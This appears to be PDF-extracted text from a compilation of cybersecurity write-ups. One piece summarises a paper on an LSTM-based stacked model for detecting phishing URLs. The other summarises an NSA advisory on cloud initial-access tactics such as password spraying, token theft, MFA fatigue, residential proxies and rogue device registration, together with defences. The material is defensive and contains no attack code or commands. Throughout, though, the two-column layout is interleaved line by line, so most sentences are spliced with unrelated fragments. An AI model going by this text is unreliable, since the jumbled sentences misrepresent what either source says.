performance compared to existing methods will be scrutinized. in two phases (two-phase stack generalized model):
The analysis will also delve into the practical applications of the
model, discussing how it can be integrated into existing cybersecurity • Phase I: The model learns URLs and character-level
measures and its potential impact on reducing phishing attacks. The TF-IDF features symmetrically. These features are
document's relevance to cybersecurity professionals, IT specialists, trained on a base machine learning classifier, employing
and stakeholders in various industries will be highlighted, K-fold cross-validation for robust mean prediction.
emphasizing the importance of advanced phishing detection
techniques in the current digital landscape. • Phase II: A two-layered stacked-based LSTM network
This summary will serve as a valuable resource for cybersecurity with five adaptive optimizers is used for dynamic
experts, IT professionals, and others interested in the latest compilation, ensuring premier prediction on these
developments in phishing detection and prevention. features.
A. Introduction • Additionally, the symmetrical predictions from both
The paper titled "LSTM-based Stacked Generalization phases are optimized and integrated to train a meta-
Model for Optimized Phishing" discusses the escalating reliance XGBoost classifier, contributing to a final robust
on revolutionary online web services, which has introduced prediction.
heightened security risks, with persistent challenges posed by 1) URL Features
phishing attacks. • URL Structure: The paper emphasizes that attackers
Phishing, a deceptive method through social and technical often create phishing URLs that appear legitimate to
engineering, poses a severe threat to online security, aiming to users. Attackers use URL jamming tactics to deceive
obtain illicit user identities, personal account details, and bank users into disclosing personal information.
credentials. It's a primary concern within criminal activity, with
• Lightweight Features: The research aims to detect
phishers pursuing objectives such as selling stolen identities,
phishing websites using lightweight features,
extracting cash, exploiting vulnerabilities, or deriving financial
specifically a weight factor URL token system, which
gains.
allows for quick detection without accessing the
The study aims to advance phishing detection with operating website's content.
without prior phishing-specific feature knowledge. The model
leverages the capabilities of Long Short-Term Memory (LSTM) • Weight Calculation: The paper provides a formula for
networks, a type of recurrent neural network that is capable of calculating the weight Wi for i-th distinct word in a URL,

29
 Read more: Boosty | Sponsr | TG

which is used to assign a weight value to each URL for • Stack Generalization for Feature Extraction: The
phishing prediction. model uses stack generalization to extract local URL
features from the character sequences, and a meta-
• URL Components: The paper describes the classifier is designed for the final prediction.
components of a URL, including the protocol, host IP
address or resource location, major domains, top-level • Advantages of the Approach: This approach allows
domains (TLD), port number, path, and optional fields the proposed model to train on URL character sequences
like inquiry. as natural features, which simplifies the learning process
and potentially improves the model's ability to detect
• Phishing Indicators: Several sub-features are identified phishing URLs without prior feature knowledge
as indicators of phishing, such as the use of an IP address
instead of a domain name, the presence of the '@' 3) Stack generalization model
symbol, the "//" symbol, domain name prefixes and • Two-Phase Approach: The model is divided into two
suffixes separated by the "-" sign, and the use of multiple phases. Phase I uses machine learning classifiers to
sub-domains. generate a mean prediction, while Phase II employs a
• HTTPS and Certificate Age: The paper notes that most two-layered LSTM-based stack generalized model
legitimate sites use HTTPS, and the age of the certificate optimized for premier prediction in phishing site
is crucial. A trustworthy certificate is required. detection.

• Favicon: The favicon can be used to redirect clients to • Integration of Predictions: The mean prediction from
dubious sites when layered from external space. Phase I is combined with the premier prediction from
Phase II. A meta-classifier, specifically XGBoost, is
• Sub-features Analysis: The paper provides an analysis then used to deliver the final prediction.
of sub-features like the IP address, '@' symbol, "//"
symbol, domain name prefixes and suffixes, HTTPS, • Stack Generalization Technique: The model uses
and favicon, explaining how these features can be used stack generalization, an ensemble learning
to identify phishing websites methodology that integrates various machine learning
algorithms and deep learning models, to enhance
2) Character Level Features detection impact.
• TF-IDF for Character-Level Features: The paper • Model Flow: The model's flow includes collecting
utilizes Term Frequency-Inverse Document Frequency datasets, dividing them into training and testing sets,
(TF-IDF) at the character level to determine the relative constructing the stack generalization model's phases,
importance of characters within URLs across the corpus and merging predictions for the ultimate prediction.
of URLs being analyzed.
• Feature Importance: The model emphasizes the
• TF-IDF Calculation: The TF-IDF score is composed of importance of URL and character-level TF-IDF
two parts: Term Frequency (TF), which is the features, which are learned symmetrically to detect
normalized count of a term within a document, and phishing web pages.
Inverse Document Frequency (IDF), which is the
logarithm of the ratio of the total number of documents • Significant Advantages: The model offers several
to the number of documents containing the term. advantages, including independence from prior feature
knowledge, strong generalization ability, and
• Levels of TF-IDF: The paper mentions that TF-IDF independence from cybersecurity experts and third-
vectors can be generated at different levels, such as word party services.
level, character level, and n-gram level, with the
character level being particularly relevant for this study. • Enhanced Phishing Detection: The model aims to
intelligently identify new phishing URLs previously
• Limitations of TF-IDF: The paper acknowledges that unidentified as fraudulent, demonstrating robust
while TF-IDF is useful for extracting prominent performance on benchmark datasets.
keywords, it has limitations, such as failing to extract
misspelled terms, which can be problematic since URLs 4) Experiments
may contain nonsensical words. It presents the experimental validation of the proposed
model. The model was tested on two benchmark datasets, which
• Character-Level TF-IDF: To address the limitations of
comprised benign and phishing or malicious URLs.
TF-IDF for URLs that may contain misspelled or
nonsensical words, the study employs a character-level • The model demonstrated exceptional performance in
TF-IDF approach with a maximum feature count of detecting phishing sites, achieving an accuracy of
5000. 96.04%. This result was notably higher compared to
existing studies.
• Natural Feature Learning: The model treats URL
strings as character sequences, which are considered • The model was assessed through various matrices,
natural features that do not require prior feature including AUC-ROC curve, Precision, Recall, F1,
knowledge for the model to learn effectively.

30
 Read more: Boosty | Sponsr | TG

mean absolute error (MAE), mean square error (MSE), D. Key findings
and accuracy. The model's design allows it to effectively identify new
• A comparative analysis with baseline models and phishing URLs previously unidentified as fraudulent, thus
traditional machine learning algorithms, such as reducing the likelihood of false negatives. The use of K-fold
support vector machine, decision tree, naïve Bayes, cross-validation and a two-layered LSTM network helps to
logistic regression, K-nearest neighbor, and sequential mitigate overfitting and improve the model's ability to correctly
minimal optimization, highlighted the superior classify phishing sites, thereby reducing the likelihood of false
phishing detection efficiency of the model. positives.

• The model was found to be effective in identifying new • Development of model: a novel mode introduced via
phishing URLs that were previously unidentified as two-phase stack generalized model designed to detect
fraudulent. phishing sites effectively.

• The model operates without prior phishing-specific • Learning of URLs and character-level TF-IDF
feature knowledge, which is a significant advantage in features symmetrically: This model leverages the
achieving advancements in cybersecurity learning of URLs and character-level TF-IDF features
symmetrically. This enhances the model's ability to
5) Optimizer evaluation on LSTM combat emerging phishing threats.
• Optimizer Performance: The paper evaluates the
performance of five different adaptive optimizers: • Two-phase operation: In Phase I, features are trained
AdaDelta, Adam, RMSprop, AdaGard, and SGD on a base machine learning classifier, employing K-
(Stochastic Gradient Descent), to determine which is fold cross-validation for robust mean prediction. Phase
best suited for the proposed anti-phishing model. II employs a two-layered stacked-based LSTM
network with five adaptive optimizers for dynamic
• Epochs and Learning Rate: Different numbers of compilation, ensuring premier prediction on these
epochs are considered to implement the 2-layered features.
LSTM with different optimizers. The learning rate, a
crucial hyperparameter, is adjusted for each optimizer • Integration of predictions (Meta-XGBoost
to control the speed at which the model learns. Classifier): The symmetrical predictions from both
phases are optimized and integrated to train a meta-
• Accuracy, MSE, and MAE: The paper reports the XGBoost classifier, contributing to a final robust
accuracy, mean squared error (MSE), and mean prediction.
absolute error (MAE) for each optimizer with the
LSTM-based stack generalization model on two • Independence from prior phishing-specific feature
datasets (DS1 and DS2). knowledge: The model operates without prior
phishing-specific feature knowledge, which is a
• Results on Datasets: The AdaGard optimizer provided significant advancement in phishing detection that
the highest accuracy with the lowest MSE and MAE on showing strong generalization ability and
DS1, while the Adam optimizer achieved the highest independence from cybersecurity experts and third-
accuracy on DS2. party services.
• Precision-Recall Curves: Precision-recall curves are • High performance: Experimental validation on two
presented for each feature set, indicating the trade-off benchmark datasets, comprising benign and phishing
between precision and recall for the different or malicious URLs, demonstrates the model's
optimizers. exceptional performance, achieving a notable 96.04%
accuracy compared to existing studies
• Optimizer Selection: The analysis suggests that the
learning rate significantly contributes to the success of • Independence from cybersecurity experts and
the proposed model with the adaptive optimizers. The third-party services: This model autonomously
Adam optimizer is highlighted for its performance with extracts necessary URL features, eliminating the
a specific learning rate when the 2-layered LSTM is reliance on cybersecurity experts. It also demonstrates
employed with 100 epochs. independence from third-party features such as page
rank or domain age
• Comparative Analysis: The average performance of
the optimizers on DS1 and DS2 is compared, with DS2 • Strong generalization ability: The URL character-
showing slightly better accuracy. based features are utilized for more robust
generalization and check-side accuracy, and the multi-
• Significance of Optimizers: The evaluation of level or low-level features are combined in the hidden
optimizers is crucial for the model's accuracy, which is layers of the neural network to attain effective
a key component of machine learning and artificial generalization
intelligence, responsible for molding the model to
acquire the most accurate results possible • Prior feature knowledge independence: The
approach taken in this work treats URL strings as

31
 Read more: Boosty | Sponsr | TG

character sequences, serving as natural features that • Performance on Other Datasets: The model's
require no prior feature knowledge for the proposed performance has been validated on two benchmark
model to learn effectively datasets, but it's unclear how it would perform on other
datasets or in different contexts.
• Enhancing Network Security: The research adds
value to the ongoing discourse on symmetry and • Feature Reliance: The model's reliance on URL and
asymmetry in information security and provides a character-level TF-IDF features may limit its ability to
forward-thinking solution for enhancing network detect phishing attempts that use other tactics.
security in the face of evolving cyber threats.
• Computational Resources: The paper does not
E. Benefits and limitations of the study discuss the computational resources required to
Comparatively, traditional phishing systems, reliant on implement the model, which could be a potential
machine learning and manual features, struggle with evolving limitation for some users.
tactics. Other models, such as the CNN-LSTM model and the The proposed model has several limitations in terms of
end-to-end deep learning architecture grounded in natural scalability and performance.
language processing techniques, have shown limitations in their
generalization on test data and their dependency on existing • Firstly, the model's reliance on Long Short-Term
knowledge of phishing detection. The model, in contrast, shows Memory (LSTM) networks can lead to computational
strong generalization ability and independence from prior inefficiency. LSTM networks are known for their high
feature knowledge, making it a robust and effective tool for computational and memory requirements, which can
phishing detection. limit the model's scalability when dealing with large
datasets or in real-time applications.
The benefits of the study compared to traditional phishing
systems include: • Secondly, the model's two-phase approach, which
involves training features on a base machine learning
• Prior Feature Knowledge Independence: The classifier and then employing a two-layered stacked-
proposed model does not require prior phishing- based LSTM network, can be time-consuming and
specific feature knowledge, which allows it to adapt to computationally intensive. This could potentially limit
new and evolving phishing tactics more effectively the model's performance in real-time phishing detection
than traditional systems that rely on predefined scenarios.
features.
• Lastly, while the model is designed to operate without
• Strong Generalization Ability: The model uses URL prior phishing-specific feature knowledge, this could
character-based features for robust generalization and also be a limitation. The model may struggle to
check-side accuracy, which enables it to generalize accurately detect new or sophisticated phishing attempts
across different phishing threats better than traditional that exploit features not considered in the model's
systems that may not adapt as well to variations in training.
phishing URLs.
F. Implications for Future Research
• Independence from Cybersecurity Experts and
Third-Party Services: The model autonomously • Model Generalization: The model's ability to operate
extracts necessary URL features, reducing the reliance without prior phishing-specific feature knowledge
on cybersecurity experts and third-party services like suggests that future research could explore the
page rank or domain age, which traditional systems development of more generalized models that can adapt
may depend on. to various types of cyber threats without extensive
retraining.
• High Accuracy: The model has demonstrated
exceptional performance, achieving a notable 96.04% • Deep Learning Techniques: The success of the LSTM-
accuracy on benchmark datasets, which is a significant based model indicates that deep learning techniques
improvement over traditional phishing detection have significant potential in cybersecurity applications.
systems. Future research could further investigate the integration
of different neural network architectures and their
• Adaptability to Evolving Threats: The model's effectiveness in threat detection.
design allows it to learn from the data it processes,
making it potentially more adaptable to the • Feature Extraction: The use of character-level TF-IDF
continuously evolving tactics used by phishers, unlike features and URL analysis in the model demonstrates
traditional systems that may require manual updates to the importance of feature extraction in phishing
stay effective. detection. Research could focus on identifying new
features and methods of extraction to improve detection
Limitations of the study include: rates.
• Real-World Application: The paper does not discuss • Stack Generalization: The two-phase approach used in
the model's performance in real-world scenarios where the model, which combines machine learning classifiers
phishing tactics are constantly evolving.

32
 Read more: Boosty | Sponsr | TG

and LSTM networks, showcases the benefits of stacked H. Potential future research directions
generalization. Future studies could explore other • Improving Generalization Ability: The model has a
combinations of algorithms and models to enhance strong generalization ability, utilizing URL character-
predictive performance. based features for robust generalization and check-side
• Benchmark Datasets: The use of benchmark datasets accuracy. Future research could focus on further
for model validation in this study underscores the need enhancing this ability, particularly in the context of
for comprehensive and up-to-date datasets in evolving phishing tactics and techniques.
cybersecurity research. Future work could involve • Enhancing Independence from Cybersecurity
creating and maintaining datasets that reflect the latest Experts and Third-Party Services: The model
threat landscapes. autonomously extracts necessary URL features,
G. Main Contribution to Cybersecurity eliminating reliance on cybersecurity experts and third-
party services. Future research could explore ways to
• Prior Feature Knowledge Independence: The model's further improve this independence, potentially through
ability to learn from URL strings as character sequences the development of more sophisticated feature
without the need for prior feature knowledge simplifies extraction techniques.
the detection process and makes it more adaptable to
new and unknown phishing attacks. • Optimizing the Stacked Generalization Model: The
model uses a two-phase stacked generalization model,
• Strong Generalization Ability: The model's use of with the first phase generating a mean prediction and
URL character-based features for robust generalization the second phase utilizing a two-layered LSTM-based
and check-side accuracy, combined with the integration stack generalized model optimized for premier
of multi-level features in the neural network, contributes prediction in phishing site detection. Future research
to its effectiveness in generalizing across different could focus on optimizing this model, perhaps through
phishing threats. the use of different machine learning algorithms or
• Independence from Cybersecurity Experts and techniques.
Third-Party Services: By autonomously extracting
• Enhancing Accuracy: While the model has
necessary URL features, the model reduces reliance on demonstrated high accuracy in detecting phishing sites,
cybersecurity experts and third-party services, making it future research could focus on ways to further enhance
a self-sufficient tool for phishing detection. this accuracy, particularly in the context of zero-day
• Enhanced Detection Accuracy: The model's attacks and other advanced phishing techniques.
experimental validation on benchmark datasets • Expanding the Model to Other Cybersecurity
demonstrated exceptional performance, with a notable Applications: The model could potentially be adapted
accuracy of 96.04%, which is higher than that of existing for other cybersecurity applications beyond phishing
studies. detection.
• Contribution to Symmetry in Information Security:
The research adds to the discourse on symmetry and
asymmetry in information security by providing a model
that can symmetrically learn and detect phishing URLs,
thereby enhancing network security against evolving
cyber threats.

33
 Read more: Boosty | Sponsr | TG

NSA’S PANIC.
ADAPTTACTICS

34
 Read more: Boosty | Sponsr | TG

Over the past year, the TTPs observed have been alarmingly
simple yet effective, with the cyber actors exploiting service and
dormant accounts through brute force attacks. The document
offers a cold comfort implies a race against time to fortify their
defenses against these TTPs to prevent initial access.
B. Key findings
• Adaptation to Cloud Services: Cyber actors have
shifted their focus from exploiting on-premises network
vulnerabilities to directly targeting cloud services. This
change is a response to the modernization of systems
and the migration of organizational infrastructure to the
cloud.
• Authentication as a Key Step: To compromise cloud-
hosted networks, cyber actors must first successfully
authenticate with the cloud provider. Preventing this
initial access is crucial for stopping from compromising
the target.
• Expansion of Targeting: Cyber actors have broadened
their targeting to include sectors such as aviation,
education, law enforcement, local and state councils,
government financial departments, and military
Abstract – This document provides a comprehensive analysis of organizations. This expansion indicates a strategic
publication which details the evolving tactics, techniques, and diversification of targets for intelligence gathering.
procedures (TTPs) employed by cyber actors to gain initial access to
cloud-based systems. The analysis will cover various aspects • Use of Service and Dormant Accounts: it highlights
including the identification and exploitation of vulnerabilities, that cyber actors have been observed using brute force
different cloud exploitation techniques, deployment of custom attacks to access service and dormant accounts over the
malware. last 12 months. This tactic allows to gain initial access
The analysis provides a distilled exploration, highlighting the key to cloud environments.
points and actionable intelligence that can be leveraged by
cybersecurity professionals, IT personnel, and specialists across • Sophistication of cyber actors: The cyber actors can
various industries to enhance their defensive strategies against state- execute global supply chain compromises, such as the
sponsored cyber threats. By understanding the actor’s adapted 2020 SolarWinds incident.
tactics for initial cloud access, stakeholders can better anticipate and
mitigate potential risks to their cloud-hosted infrastructure, thereby • Defense through Cybersecurity Fundamentals: The
strengthening their overall security posture. advisory emphasizes that a strong baseline of
cybersecurity fundamentals can defend against cyber
A. Introduction actors. For organizations that have transitioned to cloud
The document titled “cyber actors adapt tactics for initial infrastructure, protecting against TTPs for initial access
cloud access” released by the National Security Agency (NSA) is presented as a first line of defense.
warns of use of cyber actors have adapted their tactics to gain
initial access to cloud services, as opposed to exploiting on- C. Adaptation to Cloud Services
premise network vulnerabilities. The adaptation of attacks to target cloud services marks a
significant evolution in the landscape of cyber espionage and
This shift is in response to organizations modernizing their cyber warfare. This shift is not merely a change in target but
systems and moving to cloud-based infrastructure. The high- represents a deeper strategic adaptation to the changing
profile cyber campaigns like the SolarWinds supply chain technological environment and the increasing reliance of
compromise are now expanding to sectors such as aviation, governments and corporations on cloud infrastructure. The
education, law enforcement, local and state councils, move towards cloud services by organizations is driven by the
government financial departments, and military organizations. benefits of scalability, cost-efficiency, and the ability to rapidly
The stark reality is that to breach cloud-hosted networks, deploy and update services. However, this transition also
these actors need only to authenticate with the cloud provider, presents new vulnerabilities and challenges for cybersecurity.
and if they succeed, the defenses are breached. The document 1) Strategic Shift to Cloud
highlights a particularly disconcerting aspect of cloud As organizations have modernized their systems and
environments: the reduced network exposure compared to on- migrated to cloud-based infrastructure, actors have adapted their
premises systems paradoxically makes initial access a more tactics, techniques, and procedures (TTPs) to this new
significant linchpin. environment. This adaptation is driven by the realization that
cloud services, by centralizing vast amounts of data and

35
 Read more: Boosty | Sponsr | TG

resources, present a lucrative target for espionage and obtaining these can bypass traditional login
intelligence gathering. The cloud's architecture, while offering mechanisms.
numerous advantages to organizations, also necessitates a
reevaluation of security strategies to address unique • Credential Access / T1621 Multi-Factor
vulnerabilities. Authentication Request Generation: Known as 'MFA
bombing' or 'MFA fatigue,' this technique involves
2) Tactics, Techniques, and Procedures (TTPs) actors repeatedly sending MFA requests to a victim's
The adaptation of actors to cloud services involves a range device. The goal is to overwhelm or fatigue the victim
of sophisticated TTPs designed to exploit the specific into accepting the request, thus granting the attacker
characteristics of cloud environments. One of the primary access.
methods of gaining initial access to cloud-hosted networks
involves authenticating to the cloud provider. This can be • Command and Control / T1090.002 Proxy: External
achieved through various means, including brute forcing and Proxy: To maintain covert operations and blend in with
password spraying to access services and dormant accounts. normal traffic, actors use open proxies located in
These accounts, often used to run and manage applications residential IP ranges. This makes malicious connections
without direct human oversight, are particularly vulnerable as harder to distinguish from legitimate user activity in
they may not be protected by multi-factor authentication (MFA) access logs.
and may possess high levels of privilege. • Persistence / T1098.005 Account Manipulation:
Furthermore, actors have been observed using system-issued Device Registration: After gaining access to accounts,
tokens for authentication, bypassing the need for passwords. actors attempt to register their own devices on the cloud
They have also exploited the process of enrolling new devices to tenant. Successful device registration can provide
the cloud, bypassing MFA through techniques such as "MFA persistent access to the cloud environment.
bombing" or "MFA fatigue." Additionally, the use of residential 1) Access via Service and Dormant Accounts
proxies to obscure their internet presence and make malicious One of the key strategies employed by actors involves
activity harder to detect represents another layer of targeting service and dormant accounts within cloud
sophistication in their operations. environments. Service accounts are used to run and manage
3) Implications and Mitigations applications and services without direct human interaction.
The adaptation of actors to target cloud services has These accounts are particularly vulnerable because they often
significant implications for cybersecurity. It underscores the cannot be protected with multi-factor authentication (MFA) and
need for organizations to implement robust security measures may have highly privileged access depending on their role in
tailored to the cloud environment. This includes enforcing managing applications and services. By gaining access to these
strong password policies, implementing MFA, managing and accounts, threat actors can obtain privileged initial access to a
monitoring service and dormant accounts, and configuring network, which they can use as a launchpad for further
device enrollment policies to prevent unauthorized access. operations
Additionally, adjusting the validity time of system-issued tokens The document also highlights that campaigns have targeted
and employing network-level defenses to detect and mitigate the dormant accounts—accounts belonging to users who are no
use of residential proxies are critical steps in defending against longer active within the victim organization but have not been
these threats. removed from the system. These accounts can be exploited by
D. TTPs details: attackers to regain access to a network, especially following
incident response measures such as enforced password resets.
• Credential Access / T1110 Brute Forcing: actors actors have been observed logging into these inactive accounts
utilize password spraying and brute forcing as initial and following password reset instructions, allowing them to
infection vectors. This approach involves attempting maintain access even after incident response teams have
multiple passwords against different accounts attempted to evict them
(password spraying) or numerous password attempts on
a single account (brute forcing) to gain unauthorized 2) Cloud-Based Token Authentication
access. Another TTP mentioned in the document is the use of cloud-
based token authentication. Actors have been observed using
• Initial Access / T1078.004 Valid Accounts: Cloud system-issued access tokens to authenticate victims' accounts
Accounts: The actors gains access to cloud services by without needing a password. This technique bypasses traditional
using compromised credentials. This includes targeting credential-based authentication methods and can be particularly
both system accounts (used for automated tasks and effective if the validity period of these tokens is long or if the
services) and dormant accounts (inactive accounts that tokens are not properly secured and managed
still remain on the system).
3) Brute Forcing and Password Spraying
• Credential Access / T1528 Steal Application Access The document also describes the use of brute forcing
Token: Actors exploit stolen access tokens to log into (T1110) and password spraying by actors as initial infection
accounts without needing the passwords. Access tokens vectors. These techniques involve attempting to access accounts
are digital keys that allow access to user accounts, and by trying many passwords or using common passwords against
many accounts, respectively. Such methods are often successful

36
 Read more: Boosty | Sponsr | TG

due to the use of weak or reused passwords across different The document highlights the importance of configuring the
accounts network with robust device enrollment policies as a defense
mechanism against such attacks. By implementing strict device
4) The Role of Access Tokens validation rules and enrollment policies, organizations can
Access tokens are an integral part of modern authentication significantly reduce the risk of unauthorized device registration.
systems, especially in cloud environments. They are designed to Instances where these measures have been effectively applied
simplify the login process for users and provide a secure method have successfully defended against actors, denying them access
of accessing resources without repeatedly entering credentials. to the cloud tenant.
Tokens are typically issued after a user logs in with a username
and password, and they can be used for subsequent 10) Residential Proxies and Their Use by Actors
authentication requests. Residential proxies are intermediary services that allow
users to route their internet traffic through an IP address
5) Risks Associated with Token Authentication provided by an internet service provider (ISP) that is typically
While token-based authentication can offer convenience and assigned to a residential address. This makes the traffic appear
security, it also introduces specific risks if not properly as if it is originating from a regular home user, which can be
managed. If threat actors obtain these tokens, they can gain particularly useful for cyber actors looking to blend in with
access to accounts without needing to know the passwords. This normal internet traffic and avoid raising red flags.
can be particularly problematic if the tokens have a long validity
period or if they are not adequately secured. The use of residential proxies by actors serves to obfuscate
their true location and the source of their malicious activities. By
6) Adjusting Token Validity making their traffic appear to come from legitimate ISP ranges
The document notes that the default validity time of system- used by residential broadband customers, they can significantly
issued tokens can vary depending on the system in use. reduce the likelihood of their connections being flagged as
However, it is crucial for cloud platforms to provide malicious. This tactic complicates the efforts of cybersecurity
administrators with the ability to adjust the validity time of these defenses that rely on IP address reputation or geolocation as
tokens to suit their security needs. Shortening the validity period indicators of compromise.
of tokens can reduce the window of opportunity for
unauthorized access if tokens are compromised. 11) Challenges Posed by Residential Proxies
The effectiveness of residential proxies in hiding the origin
7) Bypassing Password Authentication and MFA of traffic presents a challenge for network defenses. Traditional
The document details how actors have successfully bypassed security measures that track and block known malicious IP
password authentication on personal accounts through addresses may not be effective against attackers using residential
techniques such as password spraying and credential reuse. proxies, as these IP addresses may not have a prior history of
Password spraying involves attempting to access a large number malicious activity and are indistinguishable from those of
of accounts using commonly used passwords, while credential legitimate users.
reuse exploits the tendency of users to recycle the same
passwords across multiple accounts. These methods exploit E. Authentication as a Key Step
weaknesses in password-based authentication systems to gain 1) Authentication as a Key Step in Cloud Security
initial access to accounts. In the evolving landscape of cybersecurity, the adaptation of
Furthermore, actors have employed a technique known as cyber actors to target cloud services underscores a pivotal shift
'MFA bombing' or 'MFA fatigue' (T1621) to bypass multi-factor in the tactics of cyber espionage. This transition from exploiting
authentication (MFA) systems. This technique involves on-premises network vulnerabilities to directly targeting cloud-
repeatedly sending MFA requests to a victim's device until the based infrastructures marks a significant evolution in cyber
victim, overwhelmed or frustrated by the constant notifications, threats. At the heart of this shift is the critical role of
accepts the request. This method effectively exploits human authentication as a key step in securing cloud-hosted networks
psychology and the inconvenience of repeated notifications to against sophisticated cyber actors.
circumvent an otherwise robust security measure. 2) The Importance of Authentication in Cloud Environments
8) Enrolling New Devices to the Cloud Authentication serves as the gateway to cloud services,
Once past these initial security barriers, the document reports determining whether access should be granted to a user or
that actors have been observed registering their own devices as system. In cloud environments, where resources and data are
new devices on the cloud tenant (T1098.005). This step is hosted off-premises and accessed over the internet, the
critical for maintaining access to the cloud environment and importance of robust authentication mechanisms cannot be
facilitating further malicious activities. The success of this tactic overstated. Unlike traditional on-premises setups, where
hinges on the absence of stringent device validation rules within physical security measures and internal network defenses can
the cloud tenant's security configuration. Without proper device provide layers of security, cloud services are inherently more
validation measures, attackers can easily add unauthorized exposed to the internet. This exposure makes the initial step of
devices to the network, granting them access to sensitive data authentication not just a security measure, but a critical defense
and systems. mechanism against unauthorized access.

9) Defense Against Unauthorized Device Enrollment 3) Challenges in Cloud Authentication

37
 Read more: Boosty | Sponsr | TG

The shift towards cloud services brings with it unique system is most vulnerable. Unlike traditional on-premises
challenges in implementing effective authentication strategies. networks, where multiple layers of security can be deployed,
One of the primary challenges is the diverse and dynamic nature cloud services are accessed over the internet, making the initial
of cloud environments. Users access cloud services from various point of entry a prime target for attackers.
locations, devices, and networks, necessitating flexible yet
secure authentication mechanisms that can adapt to different 2) Initial Access as a Foothold for Attackers
contexts without compromising security. Gaining initial access to cloud services allows attackers to
establish a foothold within the target environment. From this
Moreover, the scalability of cloud services means that position, they can potentially escalate privileges, move laterally
authentication mechanisms must be able to handle a large across the network, and access sensitive data. The distributed
number of access requests without introducing significant nature of cloud services also means that compromising a single
latency or reducing the user experience. This requirement for account can have far-reaching consequences, potentially giving
scalability and user-friendliness often conflicts with the need for attackers access to a wide array of resources and data.
stringent security measures, creating a delicate balance that
organizations must navigate. 3) Challenges in Securing Initial Access
• Remote Access: Cloud services are designed to be
4) Strategies for Strengthening Cloud Authentication accessed remotely, which inherently increases the attack
To address the challenges of cloud authentication and protect surface. Remote access points must be secured against
against sophisticated cyber actors, organizations can adopt unauthorized entry while still providing legitimate users
several strategies: with the necessary access.
• Multi-Factor Authentication (MFA): MFA adds an • Identity and Access Management (IAM): In cloud
extra layer of security by requiring users to provide two environments, IAM becomes a critical component of
or more verification factors to gain access. This security. Organizations must ensure that IAM policies
approach significantly reduces the risk of unauthorized are robust and that permissions are granted based on the
access, as obtaining multiple authentication factors is principle of least privilege to minimize the risk of initial
considerably more difficult for attackers. access by unauthorized entities.
• Adaptive Authentication: Adaptive authentication • Phishing and Social Engineering: Attackers often use
mechanisms adjust the authentication requirements phishing and social engineering tactics to gain initial
based on the context of the access request. Factors such access. These methods exploit human factors rather than
as the user's location, device, and behavior can influence technical vulnerabilities, making them difficult to
the authentication process, allowing for stricter controls defend against with traditional security measures.
in higher-risk scenarios.
4) Examples of Initial Access Techniques
• Zero Trust Architecture: Adopting a zero-trust • Credential Stuffing: This technique involves using
approach to cloud security, where no user or system is previously breached username and password pairs to
trusted by default, can enhance the effectiveness of gain unauthorized access to accounts, banking on the
authentication. This model requires strict identity likelihood that individuals reuse credentials across
verification for every user and device trying to access multiple services.
resources, regardless of their location or network.
• Exploiting Misconfigurations: Cloud services can be
• Use of Biometrics: Biometric authentication methods, complex to configure correctly, and attackers often
such as fingerprint scans or facial recognition, offer a exploit misconfigurations, such as open storage buckets
high level of security by leveraging unique physical or improperly set access controls, to gain initial access.
characteristics of users. These methods can be
particularly effective in preventing unauthorized access • Compromising Third-Party Services: Attackers may
in cloud environments. target third-party services that integrate with cloud
environments, such as SaaS applications, to gain initial
• Encryption of Authentication Data: Ensuring that all access to the cloud infrastructure.
authentication data is encrypted, both in transit and at
rest, can protect against interception and misuse by 5) Mitigating the Risks of Initial Access
attackers. This includes encryption of passwords, • Comprehensive Access Policies: Establishing and
authentication tokens, and other sensitive information enforcing comprehensive access policies can help
involved in the authentication process. control who has access to cloud resources and under
what conditions.
F. Increased Importance of Initial Access
1) The Increased Importance of Initial Access in Cloud • Regular Audits and Reviews: Conducting regular
Security audits and reviews of access logs and permissions can
help identify and rectify potential vulnerabilities before
The shift in focus by cyber actors to cloud services has
they are exploited.
brought the importance of securing initial access to the forefront
of cybersecurity efforts. In cloud environments, initial access
represents the critical juncture at which the security of the entire

38
 Read more: Boosty | Sponsr | TG

• Security Awareness Training: Educating employees 4) Challenges in Defending a Wide Range of Targets
about the risks of phishing and social engineering can • Diverse Security Postures: Different sectors have
reduce the likelihood of credentials being compromised. varying levels of cybersecurity maturity and resources,
making some more vulnerable to sophisticated cyber
• Endpoint Security: Ensuring that all devices used to threats.
access cloud services are secure and up-to-date can
prevent attackers from exploiting endpoint • Interconnectedness: The interconnected nature of
vulnerabilities to gain initial access. these sectors means that a breach in one area can have
cascading effects on others, as seen in supply chain
• Anomaly Detection: Implementing anomaly detection attacks.
systems can help identify unusual access patterns or
login attempts that may indicate an attempted breach. 5) Strategies for Mitigating Expanded Targeting Risks
• Sector-Specific Cybersecurity Frameworks:
G. Expansion of Targeting Developing and implementing cybersecurity
1) The Expansion of Targeting frameworks tailored to the unique needs and risks of
The strategic expansion of targeting by cyber actors to a each sector can enhance overall security.
broader range of sectors is a concerning development in the • Information Sharing: Sharing threat intelligence and
realm of global cybersecurity. This diversification of targets best practices within and between sectors can help
reflects a calculated approach by these actors to exploit the organizations stay ahead of emerging threats and
interconnected nature of modern industries and the increasing coordinate responses to incidents.
reliance on cloud services across various sectors.
• Regular Security Assessments: Conducting regular
2) Broadening the Scope of Espionage security assessments and penetration testing can help
The expansion into sectors such as aviation, education, law organizations identify and address vulnerabilities before
enforcement, local and state councils, government financial they are exploited.
departments, and military organizations demonstrates their • Supply Chain Security: Strengthening the security of
intent to gather intelligence from a wide spectrum of sources. the supply chain is critical, as attackers often target less
This broad targeting strategy suggests that the is not only secure elements within the supply chain to gain access
interested in traditional national security-related information but to larger organizations.
also in acquiring a diverse set of data that could provide
economic, political, or technological advantages. • Incident Response Planning: Having a well-defined
incident response plan can ensure that organizations are
3) Implications for Different Sectors prepared to quickly and effectively respond to a breach.
• Aviation: The aviation industry involves a complex
ecosystem of airlines, airports, manufacturers, and H. Use of Service and Dormant Accounts
support services, all of which handle sensitive data 1) The Use of Service and Dormant Accounts in Attacks
related to national security, safety, and proprietary The exploitation of service and dormant accounts by cyber
technology. actors represents a sophisticated and often overlooked vector of
• Education: Universities and research institutions are cyber-attacks. These accounts, which are created for various
rich sources of cutting-edge research and intellectual operational purposes within an organization's cloud and on-
property. They are often targeted for their premises environments, can provide attackers with the access
groundbreaking work in science, technology, and they need to carry out their objectives if not properly managed
defense-related areas. and secured.
• Law Enforcement: Law enforcement agencies hold 2) Understanding Service and Dormant Accounts
sensitive data on criminal investigations, national Service accounts are specialized accounts used by
security matters, and personal information of citizens, applications or services to interact with the operating system or
making them a high-value target for espionage. other services. They often have elevated privileges to perform
specific tasks and may not be tied to an individual user's identity.
• Local and State Councils: Local and state government
